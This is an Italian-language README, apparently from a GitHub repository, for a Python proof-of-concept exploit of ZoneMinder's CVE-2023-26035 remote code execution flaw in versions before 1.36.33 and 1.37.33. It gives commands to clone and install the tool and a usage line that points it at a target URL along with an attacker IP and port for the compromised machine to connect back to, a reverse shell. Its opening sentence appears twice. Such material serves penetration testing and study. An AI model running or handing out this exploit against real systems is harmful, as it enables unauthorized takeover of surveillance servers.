
Questo è uno script scritto in Python che consente lo sfruttamento della falla di sicurezza di Zoneminder descritta in CVE-2023-26035.
Questo è uno script scritto in Python che consente lo sfruttamento della falla di sicurezza di Zoneminder descritta in CVE-2023-26035. Il sistema è vulnerabile nelle versioni precedenti a 1.36.33 e 1.37.33.
Clona il repository sulla tua macchina e installa le dipendenze usando pip (si consiglia di usare virtualenv per creare un ambiente che separi queste installazioni da quelle globali)
git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt
Lo script richiede l'URL del target con il percorso root di Zoneminder (ad esempio http://example.com/zm, http://example.com o http://example.com/zoneminder), l'IP o il dominio a cui la macchina target deve connettersi e la porta a cui la macchina target deve connettersi. Ecco un esempio:
python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443
